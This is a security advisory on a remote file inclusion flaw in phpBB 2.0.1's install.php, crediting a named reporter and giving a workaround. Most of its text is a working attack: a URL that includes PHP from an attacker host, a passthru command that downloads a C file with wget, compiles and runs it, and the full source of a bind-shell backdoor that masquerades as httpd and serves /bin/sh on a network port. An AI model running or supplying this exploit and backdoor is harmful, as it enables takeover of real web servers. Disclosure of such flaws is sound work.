|
|
|
|
| |
| phpBB is one of popular PHP bulletin board systems. When "allow_url_fopen" is set to "On" and "register_globals" is also set to "On" (in php.ini), phpBB contains a vulnerability in its install.php code that will allow attackers to insert malicious PHP code into existing web pages. |
| |
Credit:
The information has been provided by morris Chang.
|
| |
Vulnerable systems:
* phpBB 2.0.1
Workaround:
Set "allow_url_fopen" to "Off" and "register_globals" to "Off". After you have completed the installation process remove or rename the install.php script. Or modify the install.php:
Find:
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);
Insert:
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
Result:
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
Example:
Create the following file:
--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------
And then type in the following URL:
http://URL/install.php?phpbb_root_dir=http://MYBOX/
This will result in something similar to:
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output started at http://host/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182
Warning: Cannot add header information - headers already sent by (output started at http://host/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183
Warning: Cannot add header information - headers already sent by (output started at http://host/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/install.php on line 346
Exploit:
The following exploit code will download a C file, compile it, execute it, and cause a backdoor to open up on the remote server.
PHP code:
<? passthru("cd /tmp && /usr/bin/wget http://host/a.c && gcc a.c -o ... && rm /tmp/a.c && /tmp/... "); ?>
Backdoor code:
/*
* Unknown author.
*/
#define PORT 13534
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main (int argc, char *argv[])
{
int i;
for(i=0;i<argc;i++) {
memset(argv[i],'\x0',strlen(argv[i]));
};
strcpy(argv[0],"/usr/local/apache/bin/httpd");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
|
|
|
|
|
